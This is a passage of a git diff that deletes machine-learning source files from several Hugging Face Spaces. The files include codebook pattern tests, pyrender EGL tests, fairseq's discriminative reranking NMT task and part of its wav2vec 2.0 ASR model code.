torch.randint(0, card, (bs, n_q, timesteps)) - ref_res = self.ref_build_pattern_sequence(z, pattern, special_token) - res, indexes, mask = pattern.build_pattern_sequence(z, special_token) - assert (res == ref_res).float().mean() == 1.0 - - # expected assertion fails on the number of timesteps - invalid_timesteps = [timesteps + 1] - if pattern.num_sequence_steps != pattern.timesteps: - invalid_timesteps.append(pattern.num_sequence_steps) - for i_timesteps in invalid_timesteps: - z2 = torch.randint(0, card, (bs, n_q, i_timesteps)) - with pytest.raises(AssertionError): - pattern.build_pattern_sequence(z2, special_token) - - # expected assertion fails on the number of codebooks - invalid_qs = [0, n_q - 1, n_q + 1] - for i_q in invalid_qs: - z3 = torch.randint(0, card, (bs, i_q, timesteps)) - with pytest.raises(AssertionError): - pattern.build_pattern_sequence(z3, special_token) - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - def test_revert_pattern_sequence(self, n_q: int, timesteps: int): - bs = 2 - card = 256 - special_token = card - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # this works assuming previous tests are successful - z = torch.randint(0, card, (bs, n_q, timesteps)) - s = self.ref_build_pattern_sequence(z, pattern, special_token) - ref_out = self.ref_revert_pattern_sequence(s, pattern, special_token) - # ensure our reference script retrieve the original sequence - assert z.shape == ref_out.shape - assert (z == ref_out).float().mean() == 1.0 - # now we can test the scatter version - out, indexes, mask = pattern.revert_pattern_sequence(s, special_token) - assert out.shape == ref_out.shape - assert (out == ref_out).float().mean() == 1.0 - - @pytest.mark.parametrize("n_q", [1, 4, 32]) - @pytest.mark.parametrize("timesteps", [16, 72]) - @pytest.mark.parametrize("card", [1, 2, 256, 1024]) - def test_revert_pattern_logits(self, n_q: int, timesteps: int, card: int): - bs = 2 - special_token = card - logits_special_token = float('nan') - - pattern_providers = self._get_pattern_providers(n_q) - for pattern_provider in pattern_providers: - pattern = pattern_provider.get_pattern(timesteps) - # this works assuming previous tests are successful - z = torch.randint(0, card, (bs, n_q, timesteps)) - s = self.ref_build_pattern_sequence(z, pattern, special_token) - logits = torch.randn((bs, card, n_q, s.shape[-1])) - ref_out = self.ref_revert_pattern_logits(logits, pattern, logits_special_token) - # ensure our reference script retrieve the original sequence - assert ref_out.shape == torch.Size([bs, card, n_q, timesteps]) - # now we can test the scatter version - out, indexes, mask = pattern.revert_pattern_logits(logits, logits_special_token) - assert out.shape == ref_out.shape - assert (out == ref_out).float().mean() == 1.0 diff --git a/spaces/Grezz/generate_human_motion/pyrender/tests/unit/test_egl.py b/spaces/Grezz/generate_human_motion/pyrender/tests/unit/test_egl.py deleted file mode 100644 index e2f4bef39e33c2794e6837b5a1bb127d8d4dba06..0000000000000000000000000000000000000000 --- a/spaces/Grezz/generate_human_motion/pyrender/tests/unit/test_egl.py +++ /dev/null @@ -1,16 +0,0 @@ -# from pyrender.platforms import egl - - -def tmp_test_default_device(): - egl.get_default_device() - - -def tmp_test_query_device(): - devices = egl.query_devices() - assert len(devices) > 0 - - -def tmp_test_init_context(): - device = egl.query_devices()[0] 
- platform = egl.EGLPlatform(128, 128, device=device) - platform.init_context() diff --git a/spaces/Hallucinate/demo/taming/modules/losses/__init__.py b/spaces/Hallucinate/demo/taming/modules/losses/__init__.py deleted file mode 100644 index d09caf9eb805f849a517f1b23503e1a4d6ea1ec5..0000000000000000000000000000000000000000 --- a/spaces/Hallucinate/demo/taming/modules/losses/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from taming.modules.losses.vqperceptual import DummyLoss - diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/discriminative_reranking_nmt/tasks/discriminative_reranking_task.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/discriminative_reranking_nmt/tasks/discriminative_reranking_task.py deleted file mode 100644 index 0e7fbba888c1ddd118da8238d644b4ab571177ff..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/discriminative_reranking_nmt/tasks/discriminative_reranking_task.py +++ /dev/null @@ -1,475 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -from dataclasses import dataclass, field - -import itertools -import logging -import os - -import numpy as np -import torch - -from fairseq import metrics -from fairseq.data import ( - ConcatDataset, - ConcatSentencesDataset, - data_utils, - Dictionary, - IdDataset, - indexed_dataset, - NestedDictionaryDataset, - NumSamplesDataset, - NumelDataset, - PrependTokenDataset, - RawLabelDataset, - RightPadDataset, - SortDataset, - TruncateDataset, - TokenBlockDataset, -) -from fairseq.dataclass import ChoiceEnum, FairseqDataclass -from fairseq.tasks import FairseqTask, register_task -from omegaconf import II, MISSING - - -EVAL_BLEU_ORDER = 4 -TARGET_METRIC_CHOICES = ChoiceEnum(["bleu", "ter"]) - -logger = logging.getLogger(__name__) - - -@dataclass -class DiscriminativeRerankingNMTConfig(FairseqDataclass): - data: str = field(default=MISSING, metadata={"help": "path to data directory"}) - num_data_splits: int = field( - default=1, metadata={"help": "total number of data splits"} - ) - no_shuffle: bool = field( - default=False, metadata={"help": "do not shuffle training data"} - ) - max_positions: int = field( - default=512, metadata={"help": "number of positional embeddings to learn"} - ) - include_src: bool = field( - default=False, metadata={"help": "include source sentence"} - ) - mt_beam: int = field(default=50, metadata={"help": "beam size of input hypotheses"}) - eval_target_metric: bool = field( - default=False, - metadata={"help": "evaluation with the target metric during validation"}, - ) - target_metric: TARGET_METRIC_CHOICES = field( - default="bleu", metadata={"help": "name of the target metric to optimize for"} - ) - train_subset: str = field( - default=II("dataset.train_subset"), - metadata={"help": "data subset to use for training (e.g. 
train, valid, test)"}, - ) - seed: int = field( - default=II("common.seed"), - metadata={"help": "pseudo random number generator seed"}, - ) - - -class RerankerScorer(object): - """Scores the target for a given (source (optional), target) input.""" - - def __init__(self, args, mt_beam): - self.mt_beam = mt_beam - - @torch.no_grad() - def generate(self, models, sample, **kwargs): - """Score a batch of translations.""" - net_input = sample["net_input"] - - assert len(models) == 1, "does not support model ensemble" - model = models[0] - - bs = net_input["src_tokens"].shape[0] - assert ( - model.joint_classification == "none" or bs % self.mt_beam == 0 - ), f"invalid batch size ({bs}) for joint classification with beam size ({self.mt_beam})" - - model.eval() - logits = model(**net_input) - - batch_out = model.sentence_forward(logits, net_input["src_tokens"]) - if model.joint_classification == "sent": - batch_out = model.joint_forward( - batch_out.view(self.mt_beam, bs // self.mt_beam, -1) - ) - scores = model.classification_forward( - batch_out.view(bs, 1, -1) - ) # input: B x T x C - - return scores - - -@register_task( - "discriminative_reranking_nmt", dataclass=DiscriminativeRerankingNMTConfig -) -class DiscriminativeRerankingNMTTask(FairseqTask): - """ - Translation rerank task. - The input can be either (src, tgt) sentence pairs or tgt sentence only. - """ - - cfg: DiscriminativeRerankingNMTConfig - - def __init__(self, cfg: DiscriminativeRerankingNMTConfig, data_dictionary=None): - super().__init__(cfg) - self.dictionary = data_dictionary - self._max_positions = cfg.max_positions - # args.tokens_per_sample = self._max_positions - # self.num_classes = 1 # for model - - @classmethod - def load_dictionary(cls, cfg, filename): - """Load the dictionary from the filename""" - dictionary = Dictionary.load(filename) - dictionary.add_symbol("") # for loading pretrained XLMR model - - return dictionary - - @classmethod - def setup_task(cls, cfg: DiscriminativeRerankingNMTConfig, **kwargs): - # load data dictionary (assume joint dictionary) - data_path = cfg.data - data_dict = cls.load_dictionary( - cfg, os.path.join(data_path, "input_src/dict.txt") - ) - - logger.info("[input] src dictionary: {} types".format(len(data_dict))) - - return DiscriminativeRerankingNMTTask(cfg, data_dict) - - def load_dataset(self, split, epoch=0, combine=False, **kwargs): - """Load a given dataset split (e.g., train, valid, test).""" - if self.cfg.data.endswith("1"): - data_shard = (epoch - 1) % self.cfg.num_data_splits + 1 - data_path = self.cfg.data[:-1] + str(data_shard) - else: - data_path = self.cfg.data - - def get_path(type, data_split): - return os.path.join(data_path, str(type), data_split) - - def make_dataset(type, dictionary, data_split, combine): - split_path = get_path(type, data_split) - - dataset = data_utils.load_indexed_dataset( - split_path, dictionary, combine=combine, - ) - return dataset - - def load_split(data_split, metric): - input_src = None - if self.cfg.include_src: - input_src = make_dataset( - "input_src", self.dictionary, data_split, combine=False - ) - assert input_src is not None, "could not find dataset: {}".format( - get_path("input_src", data_split) - ) - - input_tgt = make_dataset( - "input_tgt", self.dictionary, data_split, combine=False - ) - assert input_tgt is not None, "could not find dataset: {}".format( - get_path("input_tgt", data_split) - ) - - label_path = f"{get_path(metric, data_split)}.{metric}" - assert os.path.exists(label_path), f"could not find dataset: {label_path}" 
- - np_labels = np.loadtxt(label_path) - if self.cfg.target_metric == "ter": - np_labels = -np_labels - label = RawLabelDataset(np_labels) - - return input_src, input_tgt, label - - src_datasets = [] - tgt_datasets = [] - label_datasets = [] - - if split == self.cfg.train_subset: - for k in itertools.count(): - split_k = "train" + (str(k) if k > 0 else "") - prefix = os.path.join(data_path, "input_tgt", split_k) - if not indexed_dataset.dataset_exists(prefix, impl=None): - if k > 0: - break - else: - raise FileNotFoundError(f"Dataset not found: {prefix}") - input_src, input_tgt, label = load_split( - split_k, self.cfg.target_metric - ) - src_datasets.append(input_src) - tgt_datasets.append(input_tgt) - label_datasets.append(label) - else: - input_src, input_tgt, label = load_split(split, self.cfg.target_metric) - src_datasets.append(input_src) - tgt_datasets.append(input_tgt) - label_datasets.append(label) - - if len(tgt_datasets) == 1: - input_tgt, label = tgt_datasets[0], label_datasets[0] - if self.cfg.include_src: - input_src = src_datasets[0] - else: - input_tgt = ConcatDataset(tgt_datasets) - label = ConcatDataset(label_datasets) - if self.cfg.include_src: - input_src = ConcatDataset(src_datasets) - - input_tgt = TruncateDataset(input_tgt, self.cfg.max_positions) - if self.cfg.include_src: - input_src = PrependTokenDataset(input_src, self.dictionary.bos()) - input_src = TruncateDataset(input_src, self.cfg.max_positions) - src_lengths = NumelDataset(input_src, reduce=False) - src_tokens = ConcatSentencesDataset(input_src, input_tgt) - else: - src_tokens = PrependTokenDataset(input_tgt, self.dictionary.bos()) - src_lengths = NumelDataset(src_tokens, reduce=False) - - dataset = { - "id": IdDataset(), - "net_input": { - "src_tokens": RightPadDataset( - src_tokens, pad_idx=self.source_dictionary.pad(), - ), - "src_lengths": src_lengths, - }, - "nsentences": NumSamplesDataset(), - "ntokens": NumelDataset(src_tokens, reduce=True), - "target": label, - } - - dataset = NestedDictionaryDataset(dataset, sizes=[src_tokens.sizes],) - - assert len(dataset) % self.cfg.mt_beam == 0, ( - "dataset size (%d) is not a multiple of beam size (%d)" - % (len(dataset), self.cfg.mt_beam) - ) - - # no need to shuffle valid/test sets - if not self.cfg.no_shuffle and split == self.cfg.train_subset: - - # need to keep all hypothese together - start_idx = np.arange(0, len(dataset), self.cfg.mt_beam) - with data_utils.numpy_seed(self.cfg.seed + epoch): - np.random.shuffle(start_idx) - - idx = np.arange(0, self.cfg.mt_beam) - shuffle = np.tile(idx, (len(start_idx), 1)).reshape(-1) + np.tile( - start_idx, (self.cfg.mt_beam, 1) - ).transpose().reshape(-1) - - dataset = SortDataset(dataset, sort_order=[shuffle],) - - logger.info(f"Loaded {split} with #samples: {len(dataset)}") - - self.datasets[split] = dataset - return self.datasets[split] - - def build_dataset_for_inference(self, src_tokens, src_lengths, **kwargs): - assert not self.cfg.include_src or len(src_tokens[0]) == 2 - input_src = None - if self.cfg.include_src: - input_src = TokenBlockDataset( - [t[0] for t in src_tokens], - [l[0] for l in src_lengths], - block_size=None, # ignored for "eos" break mode - pad=self.source_dictionary.pad(), - eos=self.source_dictionary.eos(), - break_mode="eos", - ) - input_src = PrependTokenDataset(input_src, self.dictionary.bos()) - input_src = TruncateDataset(input_src, self.cfg.max_positions) - - input_tgt = TokenBlockDataset( - [t[-1] for t in src_tokens], - [l[-1] for l in src_lengths], - block_size=None, # ignored for 
"eos" break mode - pad=self.source_dictionary.pad(), - eos=self.source_dictionary.eos(), - break_mode="eos", - ) - input_tgt = TruncateDataset(input_tgt, self.cfg.max_positions) - if self.cfg.include_src: - src_tokens = ConcatSentencesDataset(input_src, input_tgt) - src_lengths = NumelDataset(input_src, reduce=False) - else: - input_tgt = PrependTokenDataset(input_tgt, self.dictionary.bos()) - src_tokens = input_tgt - src_lengths = NumelDataset(src_tokens, reduce=False) - - dataset = { - "id": IdDataset(), - "net_input": { - "src_tokens": RightPadDataset( - src_tokens, pad_idx=self.source_dictionary.pad(), - ), - "src_lengths": src_lengths, - }, - "nsentences": NumSamplesDataset(), - "ntokens": NumelDataset(src_tokens, reduce=True), - } - - return NestedDictionaryDataset(dataset, sizes=[src_tokens.sizes],) - - def build_model(self, cfg: FairseqDataclass): - return super().build_model(cfg) - - def build_generator(self, args): - return RerankerScorer(args, mt_beam=self.cfg.mt_beam) - - def max_positions(self): - return self._max_positions - - @property - def source_dictionary(self): - return self.dictionary - - @property - def target_dictionary(self): - return self.dictionary - - def create_dummy_batch(self, device): - dummy_target = ( - torch.zeros(self.cfg.mt_beam, EVAL_BLEU_ORDER * 2 + 3).long().to(device) - if not self.cfg.eval_ter - else torch.zeros(self.cfg.mt_beam, 3).long().to(device) - ) - - return { - "id": torch.zeros(self.cfg.mt_beam, 1).long().to(device), - "net_input": { - "src_tokens": torch.zeros(self.cfg.mt_beam, 4).long().to(device), - "src_lengths": torch.ones(self.cfg.mt_beam, 1).long().to(device), - }, - "nsentences": 0, - "ntokens": 0, - "target": dummy_target, - } - - def train_step( - self, sample, model, criterion, optimizer, update_num, ignore_grad=False - ): - if ignore_grad and sample is None: - sample = self.create_dummy_batch(model.device) - - return super().train_step( - sample, model, criterion, optimizer, update_num, ignore_grad - ) - - def valid_step(self, sample, model, criterion): - if sample is None: - sample = self.create_dummy_batch(model.device) - - loss, sample_size, logging_output = super().valid_step(sample, model, criterion) - - if not self.cfg.eval_target_metric: - return loss, sample_size, logging_output - - scores = logging_output["scores"] - - if self.cfg.target_metric == "bleu": - assert sample["target"].shape[1] == EVAL_BLEU_ORDER * 2 + 3, ( - "target does not contain enough information (" - + str(sample["target"].shape[1]) - + "for evaluating BLEU" - ) - - max_id = torch.argmax(scores, dim=1) - select_id = max_id + torch.arange( - 0, sample_size * self.cfg.mt_beam, self.cfg.mt_beam - ).to(max_id.device) - bleu_data = sample["target"][select_id, 1:].sum(0).data - - logging_output["_bleu_sys_len"] = bleu_data[0] - logging_output["_bleu_ref_len"] = bleu_data[1] - - for i in range(EVAL_BLEU_ORDER): - logging_output["_bleu_counts_" + str(i)] = bleu_data[2 + i] - logging_output["_bleu_totals_" + str(i)] = bleu_data[ - 2 + EVAL_BLEU_ORDER + i - ] - - elif self.cfg.target_metric == "ter": - assert sample["target"].shape[1] == 3, ( - "target does not contain enough information (" - + str(sample["target"].shape[1]) - + "for evaluating TER" - ) - - max_id = torch.argmax(scores, dim=1) - select_id = max_id + torch.arange( - 0, sample_size * self.cfg.mt_beam, self.cfg.mt_beam - ).to(max_id.device) - ter_data = sample["target"][select_id, 1:].sum(0).data - - logging_output["_ter_num_edits"] = -ter_data[0] - logging_output["_ter_ref_len"] = -ter_data[1] - 
- return loss, sample_size, logging_output - - def reduce_metrics(self, logging_outputs, criterion): - super().reduce_metrics(logging_outputs, criterion) - - if not self.cfg.eval_target_metric: - return - - def sum_logs(key): - return sum(log.get(key, 0) for log in logging_outputs) - - if self.cfg.target_metric == "bleu": - counts, totals = [], [] - for i in range(EVAL_BLEU_ORDER): - counts.append(sum_logs("_bleu_counts_" + str(i))) - totals.append(sum_logs("_bleu_totals_" + str(i))) - - if max(totals) > 0: - # log counts as numpy arrays -- log_scalar will sum them correctly - metrics.log_scalar("_bleu_counts", np.array(counts)) - metrics.log_scalar("_bleu_totals", np.array(totals)) - metrics.log_scalar("_bleu_sys_len", sum_logs("_bleu_sys_len")) - metrics.log_scalar("_bleu_ref_len", sum_logs("_bleu_ref_len")) - - def compute_bleu(meters): - import inspect - import sacrebleu - - fn_sig = inspect.getfullargspec(sacrebleu.compute_bleu)[0] - if "smooth_method" in fn_sig: - smooth = {"smooth_method": "exp"} - else: - smooth = {"smooth": "exp"} - bleu = sacrebleu.compute_bleu( - correct=meters["_bleu_counts"].sum, - total=meters["_bleu_totals"].sum, - sys_len=meters["_bleu_sys_len"].sum, - ref_len=meters["_bleu_ref_len"].sum, - **smooth, - ) - return round(bleu.score, 2) - - metrics.log_derived("bleu", compute_bleu) - elif self.cfg.target_metric == "ter": - num_edits = sum_logs("_ter_num_edits") - ref_len = sum_logs("_ter_ref_len") - - if ref_len > 0: - metrics.log_scalar("_ter_num_edits", num_edits) - metrics.log_scalar("_ter_ref_len", ref_len) - - def compute_ter(meters): - score = meters["_ter_num_edits"].sum / meters["_ter_ref_len"].sum - return round(score.item(), 2) - - metrics.log_derived("ter", compute_ter) diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/models/wav2vec/wav2vec2_asr.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/models/wav2vec/wav2vec2_asr.py deleted file mode 100644 index eb5d819da5121a243e345b3812292ef0b13ccf98..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/models/wav2vec/wav2vec2_asr.py +++ /dev/null @@ -1,664 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -from argparse import Namespace -import contextlib -import copy -import math -import numpy as np -import torch -import torch.nn as nn -import torch.nn.functional as F -from dataclasses import dataclass, field -from omegaconf import MISSING, II, open_dict -from typing import Any, Optional - -from fairseq import checkpoint_utils, tasks, utils -from fairseq.dataclass import FairseqDataclass -from fairseq.dataclass.utils import convert_namespace_to_omegaconf -from fairseq.tasks import FairseqTask -from fairseq.models import ( - BaseFairseqModel, - FairseqEncoder, - FairseqEncoderDecoderModel, - FairseqIncrementalDecoder, - register_model, -) -from fairseq.models.wav2vec.wav2vec2 import MASKING_DISTRIBUTION_CHOICES -from fairseq.modules import ( - LayerNorm, - PositionalEmbedding, - TransformerDecoderLayer, -) - - -@dataclass -class Wav2Vec2AsrConfig(FairseqDataclass): - w2v_path: str = field( - default=MISSING, metadata={"help": "path to wav2vec 2.0 model"} - ) - no_pretrained_weights: bool = field( - default=False, metadata={"help": "if true, does not load pretrained weights"} - ) - dropout_input: float = field( - default=0.0, - metadata={"help": "dropout to apply to the input (after feat extr)"}, - ) - final_dropout: float = field( - default=0.0, - metadata={"help": "dropout after transformer and before final projection"}, - ) - dropout: float = field( - default=0.0, metadata={"help": "dropout probability inside wav2vec 2.0 model"} - ) - attention_dropout: float = field( - default=0.0, - metadata={ - "help": "dropout probability for attention weights inside wav2vec 2.0 model" - }, - ) - activation_dropout: float = field( - default=0.0, - metadata={ - "help": "dropout probability after activation in FFN inside wav2vec 2.0 model" - }, - ) - conv_feature_layers: Optional[str] = field( - default="[(512, 10, 5)] + [(512, 3, 2)] * 4 + [(512,2,2)] + [(512,2,2)]", - metadata={ - "help": ( - "string describing convolutional feature extraction " - "layers in form of a python list that contains " - "[(dim, kernel_size, stride), ...]" - ), - }, - ) - encoder_embed_dim: Optional[int] = field( - default=768, metadata={"help": "encoder embedding dimension"} - ) - - # masking - apply_mask: bool = field( - default=False, metadata={"help": "apply masking during fine-tuning"} - ) - mask_length: int = field( - default=10, metadata={"help": "repeat the mask indices multiple times"} - ) - mask_prob: float = field( - default=0.5, - metadata={ - "help": "probability of replacing a token with mask (normalized by length)" - }, - ) - mask_selection: MASKING_DISTRIBUTION_CHOICES = field( - default="static", metadata={"help": "how to choose masks"} - ) - mask_other: float = field( - default=0, - metadata={ - "help": "secondary mask argument (used for more complex distributions), " - "see help in compute_mask_indices" - }, - ) - no_mask_overlap: bool = field( - default=False, metadata={"help": "whether to allow masks to overlap"} - ) - mask_min_space: Optional[int] = field( - default=1, - metadata={"help": "min space between spans (if no overlap is enabled)"}, - ) - - # channel masking - mask_channel_length: int = field( - default=10, metadata={"help": "length of the mask for features (channels)"} - ) - mask_channel_prob: float = field( - default=0.0, metadata={"help": "probability of replacing a feature with 0"} - ) - mask_channel_selection: MASKING_DISTRIBUTION_CHOICES = field( - default="static", - metadata={"help": "how to choose mask length for channel masking"}, - ) - mask_channel_other: float = field( - 
default=0, - metadata={ - "help": "secondary mask argument (used for more complex distributions), " - "see help in compute_mask_indicesh" - }, - ) - no_mask_channel_overlap: bool = field( - default=False, metadata={"help": "whether to allow channel masks to overlap"} - ) - freeze_finetune_updates: int = field( - default=0, metadata={"help": "dont finetune wav2vec for this many updates"} - ) - feature_grad_mult: float = field( - default=0.0, metadata={"help": "reset feature grad mult in wav2vec 2.0 to this"} - ) - layerdrop: float = field( - default=0.0, metadata={"help": "probability of dropping a layer in wav2vec 2.0"} - ) - mask_channel_min_space: Optional[int] = field( - default=1, - metadata={"help": "min space between spans (if no overlap is enabled)"}, - ) - mask_channel_before: bool = False - normalize: bool = II("task.normalize") - data: str = II("task.data") - # this holds the loaded wav2vec args - w2v_args: Any = None - - -@dataclass -class Wav2Vec2CtcConfig(Wav2Vec2AsrConfig): - blank_weight: float = 0 - blank_mode: str = "add" - - -@register_model("wav2vec_ctc", dataclass=Wav2Vec2CtcConfig) -class Wav2VecCtc(BaseFairseqModel): - def __init__(self, cfg: Wav2Vec2CtcConfig, w2v_encoder: BaseFairseqModel): - super().__init__() - self.cfg = cfg - self.w2v_encoder = w2v_encoder - self.blank_weight = cfg.blank_weight - self.blank_mode = cfg.blank_mode - - def upgrade_state_dict_named(self, state_dict, name): - super().upgrade_state_dict_named(state_dict, name) - return state_dict - - @classmethod - def build_model(cls, cfg: Wav2Vec2CtcConfig, task: FairseqTask): - """Build a new model instance.""" - w2v_encoder = Wav2VecEncoder(cfg, len(task.target_dictionary)) - return cls(cfg, w2v_encoder) - - def get_logits(self, net_output, normalize=False): - logits = net_output["encoder_out"] - if self.blank_weight != 0: - if self.blank_mode == "add": - logits[..., 0] += self.blank_weight - elif self.blank_mode == "set": - logits[..., 0] = self.blank_weight - else: - raise Exception(f"invalid blank mode {self.blank_mode}") - - if net_output["padding_mask"] is not None and net_output["padding_mask"].any(): - logits[net_output["padding_mask"].T][..., 0] = float("inf") - logits[net_output["padding_mask"].T][..., 1:] = float("-inf") - - if normalize: - logits = utils.log_softmax(logits.float(), dim=-1) - - return logits - - def get_normalized_probs(self, net_output, log_probs): - """Get normalized probabilities (or log probs) from a net's output.""" - - logits = self.get_logits(net_output) - - if log_probs: - return utils.log_softmax(logits.float(), dim=-1) - else: - return utils.softmax(logits.float(), dim=-1) - - def forward(self, **kwargs): - x = self.w2v_encoder(**kwargs) - return x - - -@dataclass -class Wav2Vec2Seq2SeqConfig(Wav2Vec2AsrConfig): - decoder_embed_dim: int = field( - default=768, metadata={"help": "decoder embedding dimension"} - ) - decoder_ffn_embed_dim: int = field( - default=3072, metadata={"help": "decoder embedding dimension for FFN"} - ) - decoder_layers: int = field(default=6, metadata={"help": "num of decoder layers"}) - decoder_layerdrop: float = field( - default=0.0, metadata={"help": "decoder layerdrop chance"} - ) - decoder_attention_heads: int = field( - default=4, metadata={"help": "num decoder attention heads"} - ) - decoder_learned_pos: bool = field( - default=False, - metadata={"help": "use learned positional embeddings in the decoder"}, - ) - decoder_normalize_before: bool = field( - default=False, metadata={"help": "apply layernorm before each decoder block"} - 
) - no_token_positional_embeddings: bool = field( - default=False, - metadata={ - "help": "if set, disables positional embeddings (outside self attention)" - }, - ) - decoder_dropout: float = field( - default=0.0, metadata={"help": "dropout probability in the decoder"} - ) - decoder_attention_dropout: float = field( - default=0.0, - metadata={ - "help": "dropout probability for attention weights inside the decoder" - }, - ) - decoder_activation_dropout: float = field( - default=0.0, - metadata={ - "help": "dropout probability after activation in FFN inside the decoder" - }, - ) - max_target_positions: int = field( - default=2048, metadata={"help": "max target positions"} - ) - share_decoder_input_output_embed: bool = field( - default=False, metadata={"help": "share decoder input and output embeddings"} - ) - autoregressive: bool = II("task.autoregressive") - - -@register_model("wav2vec_seq2seq", dataclass=Wav2Vec2Seq2SeqConfig) -class Wav2Vec2Seq2SeqModel(FairseqEncoderDecoderModel): - def __init__(self, encoder, decoder): - super().__init__(encoder, decoder) - - @classmethod - def build_model(cls, cfg: Wav2Vec2Seq2SeqConfig, task: FairseqTask): - """Build a new model instance.""" - - assert ( - cfg.autoregressive - ), "Please set task.autoregressive=true for seq2seq asr models" - - src_dict, tgt_dict = task.source_dictionary, task.target_dictionary - - def build_embedding(dictionary, embed_dim): - num_embeddings = len(dictionary) - padding_idx = dictionary.pad() - emb = Embedding(num_embeddings, embed_dim, padding_idx) - return emb - - decoder_embed_tokens = build_embedding(tgt_dict, cfg.decoder_embed_dim) - - encoder = cls.build_encoder(cfg) - decoder = cls.build_decoder(cfg, tgt_dict, decoder_embed_tokens) - - return Wav2Vec2Seq2SeqModel(encoder, decoder) - - @classmethod - def build_encoder(cls, cfg: Wav2Vec2AsrConfig): - return Wav2VecEncoder(cfg) - - @classmethod - def build_decoder(cls, cfg: Wav2Vec2Seq2SeqConfig, tgt_dict, embed_tokens): - return TransformerDecoder(cfg, tgt_dict, embed_tokens) - - def forward(self, **kwargs): - encoder_out = self.encoder(**kwargs) - decoder_out = self.decoder(encoder_out=encoder_out, **kwargs) - return decoder_out - - def upgrade_state_dict_named(self, state_dict, name): - super().upgrade_state_dict_named(state_dict, name) - return state_dict - - -class Wav2VecEncoder(FairseqEncoder): - def __init__(self, cfg: Wav2Vec2AsrConfig, output_size=None): - self.apply_mask = cfg.apply_mask - - arg_overrides = { - "dropout": cfg.dropout, - "activation_dropout": cfg.activation_dropout, - "dropout_input": cfg.dropout_input, - "attention_dropout": cfg.attention_dropout, - "mask_length": cfg.mask_length, - "mask_prob": cfg.mask_prob, - "mask_selection": cfg.mask_selection, - "mask_other": cfg.mask_other, - "no_mask_overlap": cfg.no_mask_overlap, - "mask_channel_length": cfg.mask_channel_length, - "mask_channel_prob": cfg.mask_channel_prob, - "mask_channel_before": cfg.mask_channel_before, - "mask_channel_selection": cfg.mask_channel_selection, - "mask_channel_other": cfg.mask_channel_other, - "no_mask_channel_overlap": cfg.no_mask_channel_overlap, - "encoder_layerdrop": cfg.layerdrop, - "feature_grad_mult": cfg.feature_grad_mult, - } - - if cfg.w2v_args is None: - state = checkpoint_utils.load_checkpoint_to_cpu(cfg.w2v_path, arg_overrides) - w2v_args = state.get("cfg", None) - if w2v_args is None: - w2v_args = convert_namespace_to_omegaconf(state["args"]) - w2v_args.criterion = None - w2v_args.lr_scheduler = None - cfg.w2v_args = w2v_args - else: - state = None 
- w2v_args = cfg.w2v_args - if isinstance(w2v_args, Namespace): - cfg.w2v_args = w2v_args = convert_namespace_to_omegaconf(w2v_args) - - assert cfg.normalize == w2v_args.task.normalize, ( - "Fine-tuning works best when data normalization is the same. " - "Please check that --normalize is set or unset for both pre-training and here" - ) - - w2v_args.task.data = cfg.data - task = tasks.setup_task(w2v_args.task) - model = task.build_model(w2v_args.model) - - if state is not None and not cfg.no_pretrained_weights: - model.load_state_dict(state["model"], strict=True) - - model.remove_pretraining_modules() - - super().__init__(task.source_dictionary) - - d = w2v_args.model.encoder_embed_dim - - self.w2v_model = model - - self.final_dropout = nn.Dropout(cfg.final_dropout) - self.freeze_finetune_updates = cfg.freeze_finetune_updates - self.num_updates = 0 - - targ_d = None - self.proj = None - - if output_size is not None: - targ_d = output_size - elif getattr(cfg, "decoder_embed_dim", d) != d: - targ_d = cfg.decoder_embed_dim - - if targ_d is not None: - self.proj = Linear(d, targ_d) - - def set_num_updates(self, num_updates): - """Set the number of parameters updates.""" - super().set_num_updates(num_updates) - self.num_updates = num_updates - - def forward(self, source, padding_mask, **kwargs): - - w2v_args = { - "source": source, - "padding_mask": padding_mask, - "mask": self.apply_mask and self.training, - } - - ft = self.freeze_finetune_updates <= self.num_updates - - with torch.no_grad() if not ft else contextlib.ExitStack(): - res = self.w2v_model.extract_features(**w2v_args) - - x = res["x"] - padding_mask = res["padding_mask"] - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - - x = self.final_dropout(x) - - if self.proj: - x = self.proj(x) - - return { - "encoder_out": x, # T x B x C - "padding_mask": padding_mask, # B x T, - "layer_results": res["layer_results"], - } - - def forward_torchscript(self, net_input): - if torch.jit.is_scripting(): - return self.forward(net_input["source"], net_input["padding_mask"]) - else: - return self.forward_non_torchscript(net_input) - - def reorder_encoder_out(self, encoder_out, new_order): - if encoder_out["encoder_out"] is not None: - encoder_out["encoder_out"] = encoder_out["encoder_out"].index_select( - 1, new_order - ) - if encoder_out["padding_mask"] is not None: - encoder_out["padding_mask"] = encoder_out[ - "padding_mask" - ].index_select(0, new_order) - return encoder_out - - def max_positions(self): - """Maximum input length supported by the encoder.""" - return None - - def upgrade_state_dict_named(self, state_dict, name): - return state_dict - - -class TransformerDecoder(FairseqIncrementalDecoder): - """ - Transformer decoder consisting of *args.decoder_layers* layers. Each layer - is a :class:`TransformerDecoderLayer`. - - Args: - args (argparse.Namespace): parsed command-line arguments - dictionary (~fairseq.data.Dictionary): decoding dictionary - embed_tokens (torch.nn.Embedding): output embedding - no_encoder_attn (bool, optional): whether to attend to encoder outputs - (default: False). 
